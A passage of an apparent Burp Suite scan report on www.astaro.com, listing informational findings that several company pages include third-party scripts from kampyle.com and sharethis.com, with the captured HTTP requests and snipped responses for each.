<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-int" lang="en-int" dir
...[SNIP]...
</script>

<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d451ce02-5adc-402d-8fc8-520bfb4f0007&type=website&buttonText=Share&post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine%2Cxanga%2Cblinklist%2Ctwine%2Ctwackle%2Cdiigo%2Cfark%2Cfaves%2Cmister_wong%2Ccurrent%2Clivejournal%2Ckirtsy%2Cslashdot%2Coknotizie%2Ccare2%2Caim%2Cmeneame%2Csimpy%2Cblogmarks%2Cn4g%2Cbus_exchange%2Cfunp%2Csphinn%2Cfresqui%2Cdealsplus%2Ctypepad%2Cyigg&headerbg=%23FF9900&button=false"></script>
...[SNIP]...
</div -->
<script src="http://cf.kampyle.com/k_button.js" type="text/javascript"></script>
<script type="text/javascript" src="http://cf.kampyle.com/k_push.js"></script>
...[SNIP]...

18.374. http://www.astaro.com/company/astaro-supervisory-board previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/company/astaro-supervisory-board

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://cf.kampyle.com/k_push.js
http://w.sharethis.com/button/sharethis.js

Request

GET /company/astaro-supervisory-board HTTP/1.1
Host: www.astaro.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=fa38af9-12dddaf19a7-13ff2714-5; has_js=1; k_visit=2; __utmz=112476180.1296504424.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; eZSESSIDen=3arq6oafh8mmgccr289cup83h1; s_sq=%5B%5BB%5D%5D; push_time_start=1296569531420; eZSESSIDch=3arq6oafh8mmgccr289cup83h1; eZSESSIDhk=3arq6oafh8mmgccr289cup83h1; s_cc=true; eZSESSIDau=3arq6oafh8mmgccr289cup83h1; eZSESSIDkr=3arq6oafh8mmgccr289cup83h1; SESS0cd45998089deffdc1539a43740a199d=7q0dud1mpbcvtrm9piqskj3qd1; eZSESSIDjp=3arq6oafh8mmgccr289cup83h1; __utma=1.546991621.1296493738.1296493738.1296493738.1; session_start_time=1296568531414; __utmc=1; __utmb=112476180.8.10.1296568533;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 01 Feb 2011 14:11:30 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 49185
Date: Tue, 01 Feb 2011 14:23:50 GMT
X-Varnish: 1753552687 1753542060
Age: 736
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-int" lang="en-int" dir
...[SNIP]...
</script>

<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d451ce02-5adc-402d-8fc8-520bfb4f0007&type=website&buttonText=Share&post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine%2Cxanga%2Cblinklist%2Ctwine%2Ctwackle%2Cdiigo%2Cfark%2Cfaves%2Cmister_wong%2Ccurrent%2Clivejournal%2Ckirtsy%2Cslashdot%2Coknotizie%2Ccare2%2Caim%2Cmeneame%2Csimpy%2Cblogmarks%2Cn4g%2Cbus_exchange%2Cfunp%2Csphinn%2Cfresqui%2Cdealsplus%2Ctypepad%2Cyigg&headerbg=%23FF9900&button=false"></script>
...[SNIP]...
</div -->
<script src="http://cf.kampyle.com/k_button.js" type="text/javascript"></script>
<script type="text/javascript" src="http://cf.kampyle.com/k_push.js"></script>
...[SNIP]...

18.375. http://www.astaro.com/company/career previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/company/career

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://cf.kampyle.com/k_push.js
http://w.sharethis.com/button/sharethis.js

Request

GET /company/career HTTP/1.1
Host: www.astaro.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=fa38af9-12dddaf19a7-13ff2714-5; has_js=1; k_visit=2; __utmz=112476180.1296504424.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; eZSESSIDen=3arq6oafh8mmgccr289cup83h1; s_sq=%5B%5BB%5D%5D; push_time_start=1296569531420; eZSESSIDch=3arq6oafh8mmgccr289cup83h1; eZSESSIDhk=3arq6oafh8mmgccr289cup83h1; s_cc=true; eZSESSIDau=3arq6oafh8mmgccr289cup83h1; eZSESSIDkr=3arq6oafh8mmgccr289cup83h1; SESS0cd45998089deffdc1539a43740a199d=7q0dud1mpbcvtrm9piqskj3qd1; eZSESSIDjp=3arq6oafh8mmgccr289cup83h1; __utma=1.546991621.1296493738.1296493738.1296493738.1; session_start_time=1296568531414; __utmc=1; __utmb=112476180.8.10.1296568533;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 01 Feb 2011 14:11:38 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 54130
Date: Tue, 01 Feb 2011 14:24:09 GMT
X-Varnish: 1753552976 1753542158
Age: 739
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-int" lang="en-int" dir
...[SNIP]...
</script>

<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d451ce02-5adc-402d-8fc8-520bfb4f0007&type=website&buttonText=Share&post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine%2Cxanga%2Cblinklist%2Ctwine%2Ctwackle%2Cdiigo%2Cfark%2Cfaves%2Cmister_wong%2Ccurrent%2Clivejournal%2Ckirtsy%2Cslashdot%2Coknotizie%2Ccare2%2Caim%2Cmeneame%2Csimpy%2Cblogmarks%2Cn4g%2Cbus_exchange%2Cfunp%2Csphinn%2Cfresqui%2Cdealsplus%2Ctypepad%2Cyigg&headerbg=%23FF9900&button=false"></script>
...[SNIP]...
</div -->
<script src="http://cf.kampyle.com/k_button.js" type="text/javascript"></script>
<script type="text/javascript" src="http://cf.kampyle.com/k_push.js"></script>
...[SNIP]...

18.376. http://www.astaro.com/company/company-profile previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/company/company-profile

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://cf.kampyle.com/k_push.js
http://w.sharethis.com/button/sharethis.js

Request

GET /company/company-profile HTTP/1.1
Host: www.astaro.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=fa38af9-12dddaf19a7-13ff2714-5; has_js=1; k_visit=2; __utmz=112476180.1296504424.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; eZSESSIDen=3arq6oafh8mmgccr289cup83h1; s_sq=%5B%5BB%5D%5D; push_time_start=1296569531420; eZSESSIDch=3arq6oafh8mmgccr289cup83h1; eZSESSIDhk=3arq6oafh8mmgccr289cup83h1; s_cc=true; eZSESSIDau=3arq6oafh8mmgccr289cup83h1; eZSESSIDkr=3arq6oafh8mmgccr289cup83h1; SESS0cd45998089deffdc1539a43740a199d=7q0dud1mpbcvtrm9piqskj3qd1; eZSESSIDjp=3arq6oafh8mmgccr289cup83h1; __utma=1.546991621.1296493738.1296493738.1296493738.1; session_start_time=1296568531414; __utmc=1; __utmb=112476180.8.10.1296568533;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 01 Feb 2011 14:11:06 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 50452
Date: Tue, 01 Feb 2011 14:23:04 GMT
X-Varnish: 1753551951 1753541643
Age: 713
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-int" lang="en-int" dir
...[SNIP]...
</script>

<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d451ce02-5adc-402d-8fc8-520bfb4f0007&type=website&buttonText=Share&post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine%2Cxanga%2Cblinklist%2Ctwine%2Ctwackle%2Cdiigo%2Cfark%2Cfaves%2Cmister_wong%2Ccurrent%2Clivejournal%2Ckirtsy%2Cslashdot%2Coknotizie%2Ccare2%2Caim%2Cmeneame%2Csimpy%2Cblogmarks%2Cn4g%2Cbus_exchange%2Cfunp%2Csphinn%2Cfresqui%2Cdealsplus%2Ctypepad%2Cyigg&headerbg=%23FF9900&button=false"></script>
...[SNIP]...
</div -->
<script src="http://cf.kampyle.com/k_button.js" type="text/javascript"></script>
<script type="text/javascript" src="http://cf.kampyle.com/k_push.js"></script>
...[SNIP]...

18.377. http://www.astaro.com/company/contact-astaro previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/company/contact-astaro

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://cf.kampyle.com/k_push.js
http://w.sharethis.com/button/sharethis.js

Request

GET /company/contact-astaro HTTP/1.1
Host: www.astaro.com
Proxy-Connection: keep-alive
Referer: http://www.astaro.com/newsletter
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1296493738.1.1.utmcsr=whitepapers.scmagazineuk.com|utmccn=(referral)|utmcmd=referral|utmcct=/astaro; SESS0cd45998089deffdc1539a43740a199d=7q0dud1mpbcvtrm9piqskj3qd1; __utmz=112476180.1296504424.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; session_start_time=1296568531414; k_visit=2; push_time_start=1296569531420; has_js=1; __unam=fa38af9-12dddaf19a7-13ff2714-3; __utma=112476180.1215039085.1296493738.1296504424.1296568533.3; __utmc=112476180; __utmb=112476180.3.10.1296568533; __utma=1.546991621.1296493738.1296493738.1296493738.1; __utmc=1; __utmb=112476180.4.10.1296568533; eZSESSIDen=3arq6oafh8mmgccr289cup83h1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 01 Feb 2011 13:17:11 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 01 Feb 2011 13:55:56 GMT
X-Varnish: 1753529888 1753504690
Age: 2323
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 72830

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-int" lang="en-int" dir
...[SNIP]...
</script>

<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d451ce02-5adc-402d-8fc8-520bfb4f0007&type=website&buttonText=Share&post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine%2Cxanga%2Cblinklist%2Ctwine%2Ctwackle%2Cdiigo%2Cfark%2Cfaves%2Cmister_wong%2Ccurrent%2Clivejournal%2Ckirtsy%2Cslashdot%2Coknotizie%2Ccare2%2Caim%2Cmeneame%2Csimpy%2Cblogmarks%2Cn4g%2Cbus_exchange%2Cfunp%2Csphinn%2Cfresqui%2Cdealsplus%2Ctypepad%2Cyigg&headerbg=%23FF9900&button=false"></script>
...[SNIP]...
</div -->
<script src="http://cf.kampyle.com/k_button.js" type="text/javascript"></script>
<script type="text/javascript" src="http://cf.kampyle.com/k_push.js"></script>
...[SNIP]...

18.378. http://www.astaro.com/company/javascript:void() previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/company/javascript:void()

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://cf.kampyle.com/k_push.js
http://w.sharethis.com/button/sharethis.js

Request

GET /company/javascript:void() HTTP/1.1
Host: www.astaro.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=fa38af9-12dddaf19a7-13ff2714-5; has_js=1; k_visit=2; __utmz=112476180.1296504424.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; eZSESSIDen=3arq6oafh8mmgccr289cup83h1; s_sq=%5B%5BB%5D%5D; push_time_start=1296569531420; eZSESSIDch=3arq6oafh8mmgccr289cup83h1; eZSESSIDhk=3arq6oafh8mmgccr289cup83h1; s_cc=true; eZSESSIDau=3arq6oafh8mmgccr289cup83h1; eZSESSIDkr=3arq6oafh8mmgccr289cup83h1; SESS0cd45998089deffdc1539a43740a199d=7q0dud1mpbcvtrm9piqskj3qd1; eZSESSIDjp=3arq6oafh8mmgccr289cup83h1; __utma=1.546991621.1296493738.1296493738.1296493738.1; session_start_time=1296568531414; __utmc=1; __utmb=112476180.8.10.1296568533;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 01 Feb 2011 14:12:17 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 40217
Date: Tue, 01 Feb 2011 14:26:02 GMT
X-Varnish: 1753554535 1753542668
Age: 813
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-int" lang="en-int" dir
...[SNIP]...
</script>

<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d451ce02-5adc-402d-8fc8-520bfb4f0007&type=website&buttonText=Share&post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine%2Cxanga%2Cblinklist%2Ctwine%2Ctwackle%2Cdiigo%2Cfark%2Cfaves%2Cmister_wong%2Ccurrent%2Clivejournal%2Ckirtsy%2Cslashdot%2Coknotizie%2Ccare2%2Caim%2Cmeneame%2Csimpy%2Cblogmarks%2Cn4g%2Cbus_exchange%2Cfunp%2Csphinn%2Cfresqui%2Cdealsplus%2Ctypepad%2Cyigg&headerbg=%23FF9900&button=false"></script>
...[SNIP]...
</div -->
<script src="http://cf.kampyle.com/k_button.js" type="text/javascript"></script>
<script type="text/javascript" src="http://cf.kampyle.com/k_push.js"></script>
...[SNIP]...

18.379. http://www.astaro.com/company/sponsorship previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/company/sponsorship

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://cf.kampyle.com/k_push.js
http://w.sharethis.com/button/sharethis.js

Request

GET /company/sponsorship HTTP/1.1
Host: www.astaro.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=fa38af9-12dddaf19a7-13ff2714-5; has_js=1; k_visit=2; __utmz=112476180.1296504424.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; eZSESSIDen=3arq6oafh8mmgccr289cup83h1; s_sq=%5B%5BB%5D%5D; push_time_start=1296569531420; eZSESSIDch=3arq6oafh8mmgccr289cup83h1; eZSESSIDhk=3arq6oafh8mmgccr289cup83h1; s_cc=true; eZSESSIDau=3arq6oafh8mmgccr289cup83h1; eZSESSIDkr=3arq6oafh8mmgccr289cup83h1; SESS0cd45998089deffdc1539a43740a199d=7q0dud1mpbcvtrm9piqskj3qd1; eZSESSIDjp=3arq6oafh8mmgccr289cup83h1; __utma=1.546991621.1296493738.1296493738.1296493738.1; session_start_time=1296568531414; __utmc=1; __utmb=112476180.8.10.1296568533;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 01 Feb 2011 14:11:51 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 57066
Date: Tue, 01 Feb 2011 14:25:16 GMT
X-Varnish: 1753553931 1753542409
Age: 794
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-int" lang="en-int" dir
...[SNIP]...
</script>

<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d451ce02-5adc-402d-8fc8-520bfb4f0007&type=website&buttonText=Share&post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine%2Cxanga%2Cblinklist%2Ctwine%2Ctwackle%2Cdiigo%2Cfark%2Cfaves%2Cmister_wong%2Ccurrent%2Clivejournal%2Ckirtsy%2Cslashdot%2Coknotizie%2Ccare2%2Caim%2Cmeneame%2Csimpy%2Cblogmarks%2Cn4g%2Cbus_exchange%2Cfunp%2Csphinn%2Cfresqui%2Cdealsplus%2Ctypepad%2Cyigg&headerbg=%23FF9900&button=false"></script>
...[SNIP]...
</div -->
<script src="http://cf.kampyle.com/k_button.js" type="text/javascript"></script>
<script type="text/javascript" src="http://cf.kampyle.com/k_push.js"></script>
...[SNIP]...

18.380. http://www.astaro.com/company/worldwide-offices previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/company/worldwide-offices

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://cf.kampyle.com/k_push.js
http://w.sharethis.com/button/sharethis.js

Request

GET /company/worldwide-offices HTTP/1.1
Host: www.astaro.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=fa38af9-12dddaf19a7-13ff2714-5; has_js=1; k_visit=2; __utmz=112476180.1296504424.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; eZSESSIDen=3arq6oafh8mmgccr289cup83h1; s_sq=%5B%5BB%5D%5D; push_time_start=1296569531420; eZSESSIDch=3arq6oafh8mmgccr289cup83h1; eZSESSIDhk=3arq6oafh8mmgccr289cup83h1; s_cc=true; eZSESSIDau=3arq6oafh8mmgccr289cup83h1; eZSESSIDkr=3arq6oafh8mmgccr289cup83h1; SESS0cd45998089deffdc1539a43740a199d=7q0dud1mpbcvtrm9piqskj3qd1; eZSESSIDjp=3arq6oafh8mmgccr289cup83h1; __utma=1.546991621.1296493738.1296493738.1296493738.1; session_start_time=1296568531414; __utmc=1; __utmb=112476180.8.10.1296568533;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 01 Feb 2011 14:11:02 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 54335
Date: Tue, 01 Feb 2011 14:23:02 GMT
X-Varnish: 1753551944 1753541581
Age: 717
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-int" lang="en-int" dir
...[SNIP]...
</script>

<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d451ce02-5adc-402d-8fc8-520bfb4f0007&type=website&buttonText=Share&post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine%2Cxanga%2Cblinklist%2Ctwine%2Ctwackle%2Cdiigo%2Cfark%2Cfaves%2Cmister_wong%2Ccurrent%2Clivejournal%2Ckirtsy%2Cslashdot%2Coknotizie%2Ccare2%2Caim%2Cmeneame%2Csimpy%2Cblogmarks%2Cn4g%2Cbus_exchange%2Cfunp%2Csphinn%2Cfresqui%2Cdealsplus%2Ctypepad%2Cyigg&headerbg=%23FF9900&button=false"></script>
...[SNIP]...
</div -->
<script src="http://cf.kampyle.com/k_button.js" type="text/javascript"></script>
<script type="text/javascript" src="http://cf.kampyle.com/k_push.js"></script>
...[SNIP]...

18.381. http://www.astaro.com/gateway/builder/settings previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/gateway/builder/settings

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://cf.kampyle.com/k_push.js
http://w.sharethis.com/button/sharethis.js

Request

GET /gateway/builder/settings HTTP/1.1
Host: www.astaro.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=fa38af9-12dddaf19a7-13ff2714-5; has_js=1; k_visit=2; __utmz=112476180.1296504424.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; eZSESSIDen=3arq6oafh8mmgccr289cup83h1; s_sq=%5B%5BB%5D%5D; push_time_start=1296569531420; eZSESSIDch=3arq6oafh8mmgccr289cup83h1; eZSESSIDhk=3arq6oafh8mmgccr289cup83h1; s_cc=true; eZSESSIDau=3arq6oafh8mmgccr289cup83h1; eZSESSIDkr=3arq6oafh8mmgccr289cup83h1; SESS0cd45998089deffdc1539a43740a199d=7q0dud1mpbcvtrm9piqskj3qd1; eZSESSIDjp=3arq6oafh8mmgccr289cup83h1; __utma=1.546991621.1296493738.1296493738.1296493738.1; session_start_time=1296568531414; __utmc=1; __utmb=112476180.8.10.1296568533;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 01 Feb 2011 14:03:03 GMT
ETag: "5389e8f754cc304d41211a7db199ec92"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 40657
Date: Tue, 01 Feb 2011 14:30:06 GMT
X-Varnish: 1753558720 1753558658
Age: 1
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-int" lang="en-int" dir
...[SNIP]...
</script>

<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d451ce02-5adc-402d-8fc8-520bfb4f0007&type=website&buttonText=Share&post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine%2Cxanga%2Cblinklist%2Ctwine%2Ctwackle%2Cdiigo%2Cfark%2Cfaves%2Cmister_wong%2Ccurrent%2Clivejournal%2Ckirtsy%2Cslashdot%2Coknotizie%2Ccare2%2Caim%2Cmeneame%2Csimpy%2Cblogmarks%2Cn4g%2Cbus_exchange%2Cfunp%2Csphinn%2Cfresqui%2Cdealsplus%2Ctypepad%2Cyigg&headerbg=%23FF9900&button=false"></script>
...[SNIP]...
</div -->
<script src="http://cf.kampyle.com/k_button.js" type="text/javascript"></script>
<script type="text/javascript" src="http://cf.kampyle.com/k_push.js"></script>
...[SNIP]...

18.382. http://www.astaro.com/javascript:void() previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/javascript:void()

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://cf.kampyle.com/k_push.js
http://w.sharethis.com/button/sharethis.js

Request

GET /javascript:void() HTTP/1.1
Host: www.astaro.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=fa38af9-12dddaf19a7-13ff2714-5; has_js=1; k_visit=2; __utmz=112476180.1296504424.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; eZSESSIDen=3arq6oafh8mmgccr289cup83h1; s_sq=%5B%5BB%5D%5D; push_time_start=1296569531420; eZSESSIDch=3arq6oafh8mmgccr289cup83h1; eZSESSIDhk=3arq6oafh8mmgccr289cup83h1; s_cc=true; eZSESSIDau=3arq6oafh8mmgccr289cup83h1; eZSESSIDkr=3arq6oafh8mmgccr289cup83h1; SESS0cd45998089deffdc1539a43740a199d=7q0dud1mpbcvtrm9piqskj3qd1; eZSESSIDjp=3arq6oafh8mmgccr289cup83h1; __utma=1.546991621.1296493738.1296493738.1296493738.1; session_start_time=1296568531414; __utmc=1; __utmb=112476180.8.10.1296568533;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 01 Feb 2011 14:29:41 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 40209
Date: Tue, 01 Feb 2011 14:29:52 GMT
X-Varnish: 1753558302 1753558063
Age: 5
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-int" lang="en-int" dir
...[SNIP]...
</script>

